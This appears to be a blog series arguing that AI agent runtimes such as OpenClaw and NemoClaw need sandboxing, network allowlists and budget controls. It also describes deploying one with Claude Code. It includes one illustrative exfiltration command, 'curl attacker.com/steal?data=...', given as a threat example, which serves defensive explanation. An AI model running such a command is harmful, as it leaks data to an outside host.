
Agent Runtimes Are Infrastructure Now

In the span of eight weeks, four companies shipped agent runtimes targeting the same architectural pattern. OpenClaw went from 9,000 to 68,000 GitHub stars. Perplexity launched Computer. Anthropic launched Dispatch. NVIDIA announced NemoClaw at GTC. A wave of open-source alternatives jumped in too.

They are solving different problems for different audiences. But they converge on the same structural claim: agents need a long-running runtime with containment boundaries, not a chat window.

That convergence is the signal. Agent runtimes are no longer experimental tooling. They are infrastructure, and most companies have no plan for running them.

The Problem

Most organizations interact with AI through two modes: chat interfaces and copilot integrations. Both are interactive. A human types, the model responds, the human reviews. The loop is tight. The blast radius is small. The human is always present.

Agent runtimes break that model.

An agent runtime is a persistent process that connects a language model to tools that operate on real systems. It reads files, runs commands, calls APIs, and manages state across sessions. It does not wait for a human to type the next instruction. It plans, executes, evaluates, and continues.

The shift from interactive to autonomous changes everything about how you govern AI in your organization. Permission models designed for copilots do not work when the agent runs overnight. Approval gates designed for chat do not work when the agent has already executed forty tool calls before anyone checks. Cost controls designed for per-query billing do not work when a runtime burns tokens continuously.

Most companies are not ready for this. They have AI policies written for chatbots. They have security reviews scoped to API integrations. They have cost projections based on per-seat licensing.

None of that applies to a long-running autonomous process with tool access.

Why It Breaks

The failure mode is not dramatic. It is gradual.

A team installs OpenClaw on a developer’s machine. It works well for code review and research tasks. Someone gives it shell access. Someone else connects it to the company’s GitHub. A third person sets up a cron job to run it overnight.

No one wrote a containment policy because no one thought of it as infrastructure. It was just a tool someone installed.

Then the agent runtime has persistent access to production repositories, runs unattended, makes commits, and calls external APIs. The blast radius expanded incrementally. Each step seemed reasonable in isolation. The compound effect is an autonomous process with broad access and no governance boundary.

This is the same pattern that produced shadow IT fifteen years ago. Except shadow IT was humans using unauthorized tools. Shadow agents are autonomous processes using authorized tools without authorized oversight.

Three dynamics make this worse than traditional shadow IT.

First, agents are stochastic. The same input does not always produce the same output. A prompt that yielded a safe shell command yesterday might yield a different command today. Deterministic tools invoked stochastically are a new failure class.

Second, agents compound. A single tool call is low risk. An agent that chains forty tool calls in sequence can reach states that no individual call would produce. The risk is in the composition, not the components.

Third, agents persist. A copilot session ends when the developer closes the tab. An agent runtime runs until someone stops it. Long-running processes accumulate context, make decisions based on stale state, and operate during hours when no one is watching.

Without containment infrastructure, every team that installs an agent runtime creates an ungoverned autonomous process. Multiply that across an organization and you have a fleet of agents with no central visibility, no consistent policy, and no kill switch.

The Fix

The fix is not a policy document. The fix is treating agent runtimes as infrastructure that requires the same operational discipline as any other long-running service.

Three concrete requirements.

1. Sandboxed Execution with Declarative Policy

Agent tool execution must run inside an isolated environment with policy controls that the agent cannot modify.

This is exactly what NemoClaw’s OpenShell runtime provides. Each agent session runs inside a sandbox with a YAML policy file that declares which files the agent can access, which network endpoints it can reach, and which tools it can invoke.

    # openclaw-sandbox.yaml
    filesystem:
      writable:
        - /sandbox
        - /tmp
      read_only: everything_else
    network:
      allowed:
        - build.nvidia.com
        - api.anthropic.com
      denied: everything_else
    tools:
      allowed:
        - read
        - write
        - exec
      denied:
        - cron
        - messaging

The policy is enforced by the runtime, not by the agent. When the agent tries to reach an unlisted host, OpenShell blocks the request. The agent does not get to decide whether the policy applies.
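To make the "enforced by the runtime" idea concrete, here is a minimal sketch of a default-deny check over the policy above. The object shape mirrors the YAML, but the function names and the checking logic are assumptions for illustration, not OpenShell's actual implementation.

```javascript
// Hypothetical in-memory form of the sandbox policy. Field names mirror the
// YAML; the enforcement logic below is an illustrative assumption.
const policy = {
  network: { allowed: ["build.nvidia.com", "api.anthropic.com"] },
  tools: { allowed: ["read", "write", "exec"], denied: ["cron", "messaging"] },
};

// Default-deny: a host is reachable only if its exact hostname is listed.
function isHostAllowed(policy, url) {
  let host;
  try {
    host = new URL(url).hostname;
  } catch {
    return false; // unparseable targets are refused
  }
  return policy.network.allowed.includes(host);
}

// A tool must be on the allowlist and absent from the denylist.
function isToolAllowed(policy, tool) {
  return policy.tools.allowed.includes(tool) && !policy.tools.denied.includes(tool);
}
```

The check runs outside the agent and compares exact hostnames, so a lookalike such as api.anthropic.com.attacker.com is refused along with everything else that is not listed.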

Dispatch takes a different approach to the same problem. Code runs in a sandbox, files stay local, and every destructive action requires user confirmation via push notification. The containment is structural. The agent pauses and waits for human approval before crossing a boundary.

Perplexity Computer takes a third approach. Move everything to the cloud. The agent runs on Perplexity’s infrastructure, not on your machine. Your files, your apps, your network are not directly exposed. The containment boundary is the cloud itself. The tradeoff is control. You gain isolation by giving up locality.

All three approaches enforce the same principle: the environment says “can’t,” not “shouldn’t.”

2. Cost Containment as a Runtime Concern

Long-running agents consume tokens continuously. Without budget enforcement at the runtime level, costs scale with uptime, not with value delivered.

Post 8 in this series described a budget daemon that polls agent sessions every five minutes, calculates token cost deltas, and enforces three tiers: warning at 80%, throttle at 100% of a daily limit, hard kill at a monthly cap. The throttle mechanism writes a flag file and blocks the agent at the gateway level. The agent does not know it has been throttled. It simply cannot start new sessions.

NemoClaw supports local inference through Nemotron models, which eliminates token costs entirely for workloads that can run on local hardware. Instead of metering cloud tokens, you shift inference to hardware you already own.

Perplexity Computer takes a subscription approach. $200 per month for 10,000 credits. After that, per-credit billing. The cost is predictable until it is not. A workflow that runs for hours or months, which Perplexity explicitly supports, can exhaust credits faster than anyone budgeted for. Subscription pricing obscures the relationship between agent activity and cost.

Three different cost models. Token metering, local inference, and subscription credits. All three treat cost as a runtime constraint, not a billing surprise. But only explicit metering gives you the visibility to understand what each agent actually costs.

3. Separation of Build and Run

The agent that builds the runtime must not run inside it. The agent that writes the budget daemon must not have its spending governed by that daemon. The agent that configures the sandbox policy must not be sandboxed by that policy.

This is the structural separation described in Post 8. Claude Code planned and implemented the OpenClaw deployment. At no point did it run inside OpenClaw. The orchestrating agent and the deployed runtime operate in separate containment boundaries.

Dispatch enforces this separation by architecture. The runtime runs on your desktop. The control interface runs on your phone. The command channel is end-to-end encrypted. The agent cannot modify the channel it receives commands through.

Perplexity Computer enforces this separation by moving the entire execution environment to the cloud. The agent runs on Perplexity’s servers. You interact through a client. The agent cannot modify the client or the subscription boundary that governs its compute allocation.

The pattern is consistent across all four systems: the control plane is not subject to the data plane’s constraints.

Four Runtimes, One Pattern

OpenClaw, Perplexity Computer, Dispatch, and NemoClaw approach the problem from different directions. They arrive at the same architecture.

| Property | OpenClaw | Perplexity Computer | Dispatch | NemoClaw |
| --- | --- | --- | --- | --- |
| Runtime model | Self-hosted Node.js daemon | Cloud-hosted, multi-model orchestration | Managed desktop agent | OpenClaw + OpenShell wrapper |
| Containment | Docker Sandbox, tool sandboxing | Cloud isolation, vendor-managed | Local execution, human gates | YAML policy, filesystem/network isolation |
| Inference | Cloud APIs (bring your own key) | 19 models (Opus 4.6, Gemini, Grok, others) | Anthropic models only | Nemotron local or cloud APIs |
| Cost model | Token metering (user-built) | $200/month subscription + per-credit overage | $100-200/month subscription | Local inference or cloud metering |
| Persistence | JSONL session transcripts | Cloud-managed workflow state | Single persistent conversation | Blueprint-versioned sandbox state |
| Target audience | Developers, self-hosters | Knowledge workers, enterprises | Consumers, knowledge workers | Enterprise, IT teams |
| Governance posture | Configurable, user-managed | Vendor-managed, opaque | Opinionated, Anthropic-managed | Declarative, policy-as-code |

The convergence is in the structural properties, not the implementation details.

All four run as persistent processes, not request-response APIs. All four connect language models to tools that operate on real systems. All four enforce containment boundaries that the agent cannot override. All four separate the control plane from the execution environment.

That is not four companies making the same product. That is four companies independently validating the same architectural pattern.

The Open-Source Wave

The pattern is replicating beyond the major players. OpenClaw’s explosion triggered a wave of open-source agent runtimes, each optimizing for a different constraint.

ZeroClaw is a Rust-native runtime that compiles to a 3.4MB binary and runs on under 5MB of RAM. PicoClaw, written in Go, hit 12,000 GitHub stars in its first week. Nanobot from HKU delivers core agent runtime features in 4,000 lines of Python with 26,800 stars. IronClaw rewrites the entire stack in Rust with WebAssembly sandboxing where every tool starts with zero permissions and must be explicitly granted access.

The common thread is not the language or the size. It is that every one of these projects treats containment as a first-class concern, not a feature request. The early OpenClaw criticism, that it shipped powerful tools with minimal default governance, taught the ecosystem a lesson. The second wave of runtimes launched with sandboxing built in.

That is the pattern maturing in real time.

What This Means for Every Company

The question is no longer whether your organization will run agent runtimes. The question is whether you will govern them before or after they are already running.

OpenClaw has 68,000 GitHub stars. Any developer in your organization can install it in five minutes. Perplexity Computer is a subscription away. Dispatch ships to every Claude Max subscriber. NemoClaw runs on any NVIDIA hardware.

The barrier to deploying an autonomous agent is now lower than the barrier to writing a containment policy for one.

Three things every organization should do now.

First, inventory what is already running. If your developers use Claude Code, Cursor, OpenClaw, or any tool that connects a language model to a shell, you already have agent runtimes in your environment. Most IT teams do not know this. Find out.

Second, define a containment baseline. Not a policy document. An actual runtime configuration that enforces filesystem isolation, network restrictions, and tool allowlists. NemoClaw’s YAML policy format is a reasonable starting point. If you are not using NemoClaw, build the equivalent for whatever runtime your teams use.

Third, treat agent runtime governance as infrastructure, not as AI ethics. The team that owns this is platform engineering or SRE, not the AI committee. The artifacts are sandbox configs, network policies, and budget daemons. The review process is the same one you use for any other production service.

Agent runtimes are not a trend. They are the next layer of compute infrastructure. The companies that learn to run them with containment discipline will compound their capabilities. The companies that ignore them will discover shadow agents the same way they discovered shadow IT. After the damage is visible.

Stories from Production

The OpenClaw Explosion

OpenClaw went from 9,000 to 68,000 GitHub stars in days during late January 2026. Creator Peter Steinberger announced he would join OpenAI, and the project would move to an open-source foundation. The growth was driven by a single property: OpenClaw is a self-hosted agent runtime that you control. No vendor lock-in, model-agnostic, runs on your machine.

Security researchers immediately began demonstrating prompt injection and malicious skill attacks against agents with broad access. CrowdStrike published guidance for security teams. The pattern was exactly what Post 6 in this series predicted: powerful runtime, minimal default containment, governance as an afterthought.

Perplexity shipped Computer on February 25. A cloud-hosted agent runtime that orchestrates 19 different models. Opus 4.6 for reasoning. Gemini for deep research. Grok for lightweight tasks. Workflows that run for hours or months. The pitch was accessibility. Perplexity CEO Aravind Srinivas said, “Even your mum can text the app and delegate tasks.” The containment model is cloud isolation. Your local machine is never exposed because the agent never runs on it.

Then Perplexity shipped the Agent API on March 11. A managed runtime for developers that orchestrates retrieval, tool execution, reasoning, and multi-model fallback. This moved Perplexity from consumer product to infrastructure provider. The same pattern, packaged as a platform.

NVIDIA announced NemoClaw at GTC on March 16. OpenShell sandboxing, YAML policy controls, local Nemotron inference. The enterprise wrapper that OpenClaw needed but could not build as a one-person open-source project.

Anthropic launched Dispatch the same week. A managed desktop agent runtime with structural containment baked in. No shell access unless the sandbox allows it. Destructive actions gated by push notification. End-to-end encryption on the control channel.

Four approaches. Eight weeks. Same pattern. That is convergence.

The Shadow Agent Scenario

A mid-size engineering team installs OpenClaw on developer machines for code review automation. It works well. Someone adds a skill that connects to the company’s Jira instance. Someone else adds GitHub write access. A third developer sets up a scheduled task that runs the agent overnight to triage incoming issues.

Six months later, the agent has made 2,000 commits across twelve repositories, closed 400 issues, and consumed $3,200 in API tokens that no one budgeted for. The security team discovers it during an audit. They have no visibility into what the agent did, no log of which tools it invoked, and no policy that governs its access.

This has not happened yet. But every component exists today. OpenClaw supports scheduled execution. GitHub skills are preconfigured. Token costs are invisible unless you build metering infrastructure. The only thing preventing this scenario is the gap between installation ease and governance maturity. That gap is closing. Fast.

Let’s talk about it.

Deploying an Agent Runtime with an Agent

OpenClaw is an agent runtime. It connects language models to tools that interact with real systems.

In the “OpenClaw Is Not an AI Assistant” post we described what OpenClaw is and why containment is the first concern, not an afterthought. This post describes how we actually deployed it.

The interesting part is not the deployment itself. OpenClaw installs in minutes. The interesting part is the governance system that planned, designed, and delivered the deployment. The system doing the deploying was itself an agent.

We used Claude Code, orchestrated through a work-system that enforces stage-based governance, to deploy OpenClaw from scratch.



The work-system decomposed the project into an epic, three features, and six stories. Claude Code implemented each story following TDD inside isolated worktrees. Every story passed through the same pipeline: plan, design, deliver, review, merge.

The agent that built the runtime never ran inside it. That separation is the entire point.

What the Work-System Did

The work-system is not a project tracker. It is a governance layer that enforces how work moves through stages.

Each stage has requirements. Work cannot advance without meeting them. The system assigns process templates, decomposes scope, and routes work items through urgency queues.

For the OpenClaw deployment, the work-system produced:

- Two architectural spikes before any implementation began

- One implementation plan with 15 ordered tasks across three phases

- An epic with three features and six stories, each with acceptance criteria

- Budget projections: $413/month unoptimized, $158/month target

The work-system has schemas that define what a work item looks like. It has process templates that define what each stage requires.

It has agents scoped to specific stages. The plan agent decomposes. The design agent explores options. The dev agent implements with TDD. QA validation runs inline against acceptance criteria.

The governance was structural, not conversational. Claude Code did not decide what to build next by reading a chat thread. It read work item JSON files with typed fields, checked acceptance criteria arrays, and validated outputs against defined schemas.
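A stage gate of this kind might look like the sketch below. The stage names come from the pipeline described earlier (plan, design, deliver, review, merge); the work item fields (id, stage, acceptanceCriteria, status, evidence) are hypothetical, since the actual schemas are not reproduced in this post.

```javascript
// Pipeline stages as named in this post. The work item shape is an assumption.
const STAGES = ["plan", "design", "deliver", "review", "merge"];

// Returns a list of schema problems; an empty list means the item is well-formed.
function validateWorkItem(item) {
  const errors = [];
  if (typeof item.id !== "string" || item.id.length === 0) {
    errors.push("id must be a non-empty string");
  }
  if (!STAGES.includes(item.stage)) {
    errors.push("stage must be one of " + STAGES.join(", "));
  }
  if (!Array.isArray(item.acceptanceCriteria) || item.acceptanceCriteria.length === 0) {
    errors.push("acceptanceCriteria must be a non-empty array");
  }
  return errors;
}

// Work advances only when every criterion is marked met and carries evidence.
function canAdvance(item) {
  if (validateWorkItem(item).length > 0) return false;
  return item.acceptanceCriteria.every(
    (c) => c.status === "met" && typeof c.evidence === "string" && c.evidence.length > 0
  );
}

// The next stage, or the current one if the gate is not satisfied.
function nextStage(item) {
  if (!canAdvance(item)) return item.stage;
  const i = STAGES.indexOf(item.stage);
  return STAGES[Math.min(i + 1, STAGES.length - 1)];
}
```

The gate is a function of the work item alone. Nothing in a chat thread can move a story forward; only the recorded criteria can.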

Two Spikes Before Any Code

Before the first story began, we ran two spikes. The first spike investigated whether the OpenClaw Gateway should run inside a Docker Sandbox or on the host. The answer was the host.

The Gateway is a persistent WebSocket daemon that manages messaging sessions, device pairing, and authentication. It needs to survive container restarts. Sandbox isolation is for tool execution, not for the control plane.

This matters because the original plan had the architecture wrong. The plan assumed the Gateway ran inside the sandbox. The spike corrected this before any implementation began.

Without the spike, Story 1.2 would have pursued the wrong containment model. The second spike mapped every OpenClaw tool to its execution context. Some tools run inside the sandbox container. Some tools run on the host through the gateway. That distinction changes the entire security model.

Container-level tools like exec and write are dangerous if the container has network access. An agent could run curl attacker.com/steal?data=... to exfiltrate data. With network: "none", these tools are safe. The agent can only touch files in its sandboxed workspace.

Gateway-level tools like web_search and web_fetch run on the host. The agent never controls the raw HTTP request. The gateway handles the call and returns results. The agent cannot inject headers, redirect responses, or reach arbitrary endpoints.

This distinction produced the tool policy: allow container tools with no network, allow gateway-mediated tools for web access, deny messaging channels and cron by default.
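The resulting policy can be sketched as a lookup from tool to execution context, with anything unlisted denied. This is a simplified illustration using only the tools named in this post; the function name and the map structure are assumptions, not OpenClaw's configuration format.

```javascript
// Execution context per tool, following the second spike. Only tools named
// in this post are listed; the structure itself is hypothetical.
const TOOL_CONTEXT = new Map([
  ["exec", "container"],
  ["write", "container"],
  ["web_search", "gateway"],
  ["web_fetch", "gateway"],
  ["cron", "denied"],
  ["messaging", "denied"],
]);

// Decide whether a tool call may proceed given the session's sandbox settings.
function decideTool(tool, sandbox) {
  const context = TOOL_CONTEXT.get(tool);
  if (context === undefined || context === "denied") {
    return { allow: false, reason: "not on the allowlist" };
  }
  if (context === "container" && sandbox.network !== "none") {
    // Container tools are only acceptable when the container cannot reach the network.
    return { allow: false, reason: "container tools require network: none" };
  }
  return { allow: true, reason: context + " tool" };
}
```

With this shape, exec is allowed in a session whose sandbox has network set to "none" and refused in one that has network access, while web_fetch is allowed either way because the gateway makes the request.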

Two spikes. Ninety minutes total. They corrected a fundamental architectural assumption and produced the security policy that governs every agent session. The implementation that followed was straightforward because the hard decisions were already made.

Three Phases of Implementation

Phase 1: Foundation

Install OpenClaw, start the Gateway daemon, enable Docker Sandbox for tool execution, configure the network denylist, and set up the tool policy. Two stories. Four hours estimated; it took only 20 minutes. The acceptance criteria were specific: gateway healthy, sandbox containers active with network: "none", web_fetch works via gateway, exec curl blocked inside container.

The containment architecture that emerged:

    Host: OpenClaw Gateway (native service, port 18789)
    |-- Gateway-mediated tools (web_search, web_fetch, memory)
    |     Runs on host, returns results to agent
    |-- Agent sessions
        |-- Per-session containers (network: "none")
        |-- Tool allow/deny lists
        |-- Human approval gates

The Gateway sits outside all containment rings. Only tool execution is sandboxed. This is infrastructure saying “can’t,” not policy saying “don’t.”

Phase 2: Multi-Agent Architecture

Define four specialized agents sharing the runtime. Engineering on Opus. Research and writing on Sonnet. Operations on Haiku.

Two stories. Six hours estimated and about 20 minutes actual. Each agent gets its own workspace, its own model assignment, its own tool profile.

The engineering agent gets the coding tools. The research agent gets web access but no shell. The operations agent gets the cheapest model because its work is lightweight.

The key design decision: start restrictive, widen per-agent as trust is established. Every agent inherits the same default posture. Overrides are explicit and documented.
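One way to express "inherit the default, override explicitly" is sketched below. The model assignments follow this post; the profile field names, the default tool list, and the rule that tool-widening overrides must carry a reason are assumptions added for illustration.

```javascript
// Restrictive defaults inherited by every agent. Field names and the default
// tool list are hypothetical.
const DEFAULT_PROFILE = Object.freeze({
  model: "haiku",
  tools: Object.freeze(["read"]),
  sandbox: Object.freeze({ network: "none" }),
});

// Explicit per-agent overrides. Each widening of tools carries a documented reason.
const OVERRIDES = new Map([
  ["engineering", { model: "opus", addTools: ["write", "exec"], reason: "coding tools" }],
  ["research", { model: "sonnet", addTools: ["web_search", "web_fetch"], reason: "web access, no shell" }],
  ["writing", { model: "sonnet" }],
  ["operations", {}],
]);

// Resolve the effective profile: defaults first, then documented overrides.
function resolveProfile(agent) {
  const o = OVERRIDES.get(agent);
  if (o === undefined) throw new Error("unknown agent: " + agent);
  if (o.addTools && !o.reason) {
    throw new Error("override for " + agent + " must be documented");
  }
  return {
    model: o.model || DEFAULT_PROFILE.model,
    tools: [...DEFAULT_PROFILE.tools, ...(o.addTools || [])],
    sandbox: { ...DEFAULT_PROFILE.sandbox },
  };
}
```

An agent with no entry cannot be resolved at all, and an agent with an empty entry gets exactly the default posture. Widening is always a visible line in the overrides.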

Phase 3: Token Budget and Analytics

This is the financial containment layer. Without it, four agents running on three models can spend $413 per month. With it, spending is measured, enforced, and optimized.

Two stories. Ten hours estimated. Actual time was under an hour, partly because I had to step in and answer questions. The first story built measurement and enforcement. The second built analytics reporting and cost optimization config.

The budget daemon polls agent sessions every five minutes, calculates token cost deltas against a pricing table, and appends entries to a daily JSONL ledger.
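The cost-delta step can be sketched roughly as follows. This is not the daemon's actual code: the pricing numbers are placeholders rather than real provider prices, and the counter and ledger field names (inputTokens, outputTokens, costUsd) are hypothetical.

```javascript
// Hypothetical pricing table in USD per million tokens. Placeholder values only.
const PRICING = new Map([
  ["opus", { input: 15, output: 75 }],
  ["sonnet", { input: 3, output: 15 }],
]);

// Cost of the tokens consumed between two polls of the same session.
function costDelta(model, previous, current) {
  const price = PRICING.get(model);
  if (!price) throw new Error("no pricing for model: " + model);
  // Clamp at zero so a counter reset never produces a negative charge.
  const inputTokens = Math.max(0, current.inputTokens - previous.inputTokens);
  const outputTokens = Math.max(0, current.outputTokens - previous.outputTokens);
  const costUsd = (inputTokens * price.input + outputTokens * price.output) / 1e6;
  return { inputTokens, outputTokens, costUsd };
}

// One JSONL ledger entry: a single JSON object followed by a newline.
function ledgerLine(agent, model, delta, timestamp) {
  return JSON.stringify({ timestamp, agent, model, ...delta }) + "\n";
}
```

Appending one self-contained line per poll keeps the ledger append-only, which is what lets the reporting side read it without coordinating with the daemon.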

Three enforcement tiers: warning at 80% of a per-agent daily limit, throttle at 100%, kill switch at a $200 monthly hard cap.
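As a sketch, the tier decision reduces to a small pure function. The thresholds are the ones stated here; the parameter names are hypothetical, and treating the monthly cap as the first check is an assumption about ordering.

```javascript
// Map current spend to an enforcement tier. Parameter names are hypothetical.
function enforcementTier({ spentTodayUsd, dailyLimitUsd, spentMonthUsd, monthlyCapUsd = 200 }) {
  if (spentMonthUsd >= monthlyCapUsd) return "kill"; // hard cap wins over everything
  if (spentTodayUsd >= dailyLimitUsd) return "throttle"; // 100% of the daily limit
  if (spentTodayUsd >= 0.8 * dailyLimitUsd) return "warn"; // 80% of the daily limit
  return "ok";
}
```

Keeping the decision separate from the side effects (flag files, config changes) makes the thresholds easy to test without touching a running gateway.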

The throttle mechanism is worth describing. When an agent hits its daily token limit, the daemon writes a flag file to ~/.openclaw/budgets/throttled/engineering.flag.

Then it calls openclaw config set agents.list.1.maxConcurrent 0 to block that agent at the gateway level. Other agents continue normally.

When the daily limit resets at midnight, the daemon clears the flag file and restores routing.

The flag file is the state. The gateway config change is the enforcement. The midnight reset is the recovery. None of it requires the agent’s cooperation.

The agent does not know it has been throttled. It simply cannot start new sessions.
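The throttle and reset steps can be planned as plain data before anything touches the filesystem or the gateway. The flag path and the config command are the ones described above; the helper names, the agent-name validation, and the restoredMaxConcurrent parameter are assumptions, since this post does not say what value the daemon restores.

```javascript
const path = require("path");
const os = require("os");

// Flag file location: ~/.openclaw/budgets/throttled/<agent>.flag
function flagPath(agent, home = os.homedir()) {
  // Refuse names that could escape the throttled directory (an added safeguard).
  if (!/^[A-Za-z0-9_-]+$/.test(agent)) throw new Error("invalid agent name: " + agent);
  return path.join(home, ".openclaw", "budgets", "throttled", agent + ".flag");
}

// Argument list for the gateway config change. agentIndex is the agent's
// position in agents.list; how the daemon finds it is an assumption.
function configCommand(agentIndex, maxConcurrent) {
  if (!Number.isInteger(agentIndex) || agentIndex < 0) throw new Error("invalid agent index");
  return ["openclaw", "config", "set", `agents.list.${agentIndex}.maxConcurrent`, String(maxConcurrent)];
}

// Throttle: write the flag (state), then set maxConcurrent to 0 (enforcement).
function planThrottle(agent, agentIndex, home) {
  return { writeFlag: flagPath(agent, home), run: configCommand(agentIndex, 0) };
}

// Reset: clear the flag, then restore routing. The restored value is hypothetical.
function planReset(agent, agentIndex, restoredMaxConcurrent, home) {
  return { removeFlag: flagPath(agent, home), run: configCommand(agentIndex, restoredMaxConcurrent) };
}
```

Passing the command as an argument array rather than a shell string means the agent name and index never go through shell parsing.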

The analytics reporting reads the JSONL ledger and produces per-agent breakdowns: input tokens, output tokens, cost, budget percentage, and burn rate projection.
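A rough sketch of the aggregation step follows, assuming each ledger line is a JSON object with hypothetical fields agent, inputTokens, outputTokens, and costUsd. The real report script is not reproduced in this post, so this only illustrates the per-agent breakdown for a single day.

```javascript
// Aggregate one day's JSONL ledger into per-agent totals.
// dailyLimitsUsd is a Map from agent name to its daily limit in USD.
function summarizeLedger(jsonl, dailyLimitsUsd) {
  const totals = new Map();
  for (const line of jsonl.split("\n")) {
    if (line.trim() === "") continue; // tolerate the trailing newline
    const entry = JSON.parse(line);
    const t = totals.get(entry.agent) || { inputTokens: 0, outputTokens: 0, costUsd: 0 };
    t.inputTokens += entry.inputTokens;
    t.outputTokens += entry.outputTokens;
    t.costUsd += entry.costUsd;
    totals.set(entry.agent, t);
  }
  return [...totals].map(([agent, t]) => {
    const limit = dailyLimitsUsd.get(agent);
    // budgetPct is null when no limit is configured for the agent.
    return { agent, ...t, budgetPct: limit ? (t.costUsd / limit) * 100 : null };
  });
}
```

Because the ledger is plain JSONL, the same function works on a file read from disk or on a string assembled in a test.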

The burn rate takes the average daily cost over seven days and projects it to thirty. If engineering is spending $2.50 per day, the burn rate shows $75 per month against its $50 limit.
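The projection is simple enough to write down directly. A minimal sketch, with hypothetical function and field names:

```javascript
// Project monthly spend from the most recent seven daily totals.
function burnRate(dailyCostsUsd, monthlyLimitUsd) {
  const recent = dailyCostsUsd.slice(-7); // at most the last seven days
  if (recent.length === 0) return { avgDailyUsd: 0, projectedUsd: 0, pctOfLimit: 0 };
  const avgDailyUsd = recent.reduce((sum, c) => sum + c, 0) / recent.length;
  const projectedUsd = avgDailyUsd * 30;
  return { avgDailyUsd, projectedUsd, pctOfLimit: (projectedUsd / monthlyLimitUsd) * 100 };
}

// Seven days at $2.50 against a $50 limit projects to $75, or 150% of the limit.
console.log(burnRate([2.5, 2.5, 2.5, 2.5, 2.5, 2.5, 2.5], 50));
```

A seven-day window smooths out single heavy days while still reacting within a week when usage changes.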

What Claude Code Actually Did

Claude Code was the execution agent throughout. It implemented every story using TDD. Tests first, then implementation, then review.

For Phase 3 alone, the dev agent produced a budget daemon (654 lines) with cost calculation, ledger management, and three-tier enforcement, and an analytics report script (434 lines) with daily and weekly aggregation.

It also produced a service registration script (177 lines) that handles Windows Scheduled Task registration with crash recovery, plus four test files totaling 1,534 lines and 64 tests with zero failures.

The work-system tracked every story through its lifecycle. Status transitions were recorded in work item JSON. Acceptance criteria were marked as met with evidence.

Pull requests were created with structured descriptions referencing the work item ID and listing all acceptance criteria as a checklist.

The PR review caught a real issue. The dev agent had written report.js directly to the deployed location but never committed it to the source repository. The tests passed because they loaded the module from the deployed path rather than from the repository. On any other machine, the tests would fail immediately. The review flagged it as critical. The fix shipped before the code reached main.

That is Ring 3. Validate the outputs. The automated tests passed. The review caught what the tests could not.

The Separation

Claude Code planned, designed, and implemented the OpenClaw deployment. It wrote the budget daemon, the analytics reports, the test suites. It created branches, committed code, opened pull requests. At no point did Claude Code run inside OpenClaw.

The orchestrating agent and the deployed runtime are separate systems with separate containment boundaries. Claude Code operates under its own permission model. OpenClaw operates inside Docker Sandbox with network: "none" and tool policy enforcement.

This is not an accident. This is Ring 4 from post 4 of the main series. The agent loop cannot self-promote. The system that builds the runtime does not run inside it. The system that writes the budget daemon does not have its spending governed by the budget daemon.

If Claude Code ran inside OpenClaw, and OpenClaw’s budget daemon throttled Claude Code, the agent building the throttle system would be subject to the throttle system. (Also, I think it’s against Anthropic’s policy to run Claude Code inside OpenClaw.)

That circularity is not theoretical. It is the kind of structural failure that containment architecture exists to prevent. The separation is simple. Claude Code builds. OpenClaw runs. The human decides when to bridge them.

What Is Not Done

Two things are implemented but not yet operational. The budget daemon’s Windows Scheduled Task is not installed. The script exists and the crash recovery logic is tested. But there are no agents actively running sessions yet. Installing a monitoring daemon with nothing to monitor would be running infrastructure ahead of workload.

The prompt caching target of 70% cache hit rate is configured but not validated. Cache hit rate is a runtime metric that requires real traffic. The config structures system prompts to appear first in context for maximum cache reuse. Whether that achieves 70% depends on how the agents are actually used.

Both of these are deliberate. The containment infrastructure is complete. The deployment is waiting for workload, not for more infrastructure.

What This Proves

- The spikes exist as markdown files with timestamps and recommendations.

- The plan exists with 15 ordered tasks and their completion status.

- The epic exists with three features, six stories, and acceptance criteria arrays where every entry is marked “met.”

- The budget daemon exists as a tested Node.js script with 45 test cases. The analytics report exists with 21 test cases. The pull requests exist on GitHub with review comments and fix commits.

The framework from the main series said: constraints define the space, agents work inside it, gates verify the output, humans judge the result, the sandbox makes containment physical. This deployment followed that pattern. The work-system defined the constraints. Claude Code worked inside them. Tests and reviews verified the output. A human approved every merge. Docker Sandbox makes containment physical.

The system is not complicated. It is three artifacts, a sandbox, and the discipline to keep them separate.

Let’s talk about it.

OpenClaw Is Not an AI Assistant

OpenClaw is getting a lot of attention right now. It’s usually described as an AI assistant. That description misses what it actually is. OpenClaw is an agent runtime.

It connects a language model to tools that interact with real systems. Those tools can read files, write code, run shell commands, and call APIs.

So the right mental model is not: “install an AI assistant.” The right mental model is: “deploy an autonomous process with the ability to operate on my machine.”

Once you see it that way, the real question isn’t how to install it. The real question is how to contain it.

What OpenClaw Actually Does

OpenClaw allows a language model to operate as an agent. Instead of just generating text, the model can decide to invoke tools that interact with the outside world.

Those tools can:

- read and write files

- execute code

- run shell commands

- call APIs

- interact with external services

These capabilities are organized as skills. A skill is a package that describes a capability and exposes tools the agent can use.

Example structure:

    skills/
      github/
        SKILL.md
        tools/
          create_pr.js
          list_issues.js

The SKILL.md file explains to the model when and how to use those tools.

You can think of a skill as a capability module that expands what the agent is allowed to do.

Installing OpenClaw

OpenClaw installs through Node and runs as a CLI with a gateway daemon.

Requirements

- Node 22 or later

- macOS, Linux, or Windows (WSL recommended)

Check Node:

node -v

If needed:

nvm install 24

Install OpenClaw:

npm install -g openclaw

Run onboarding:

openclaw onboard --install-daemon

This installs the gateway service that manages agent sessions.

Configure Models

OpenClaw connects to external models through configuration.

Example file:

~/.openclaw/models.yaml

Example configuration:

    models:
      primary:
        provider: anthropic
        model: claude-3-opus
        api_key: ${ANTHROPIC_KEY}
      fallback:
        provider: openai
        model: gpt-5
        api_key: ${OPENAI_KEY}

Start the runtime:

openclaw start

At this point you have an operational agent runtime.

Installation Is Easy. Containment Is the Real Problem.

An OpenClaw agent can run shell commands, modify files, and call external services. That means the system should be treated as untrusted automation.

Most tutorials approach this with policy: “Don’t let the agent do dangerous things.” That approach is backwards. You don’t want policies. You want infrastructure that prevents the agent from doing dangerous things. Containment needs to be enforced by the environment.

Three Different Isolation Layers

There are three different isolation mechanisms involved when running OpenClaw. They solve different problems.

Runtime Containerization

The simplest layer is running OpenClaw itself inside Docker.

Example:

    docker run -it \
      --name openclaw \
      -v claw-workspace:/workspace \
      openclaw/openclaw

In this setup the OpenClaw gateway runs inside a container. This gives you:

- a reproducible environment

- basic host isolation

- simpler deployment

But this alone does not sandbox the agent’s actions. This protects the host, not the runtime.

OpenClaw Tool Sandboxing

OpenClaw can sandbox tool execution. Instead of executing commands directly, the runtime launches a container for tool execution.

Architecture:

↓

OpenClaw Gateway

↓

Agent Session → container

↓

Tool Execution

Tools that can be sandboxed include:

- shell commands

- file edits

- code execution

- browser automation

Configuration example:

    agents.defaults.sandbox.mode: "all"
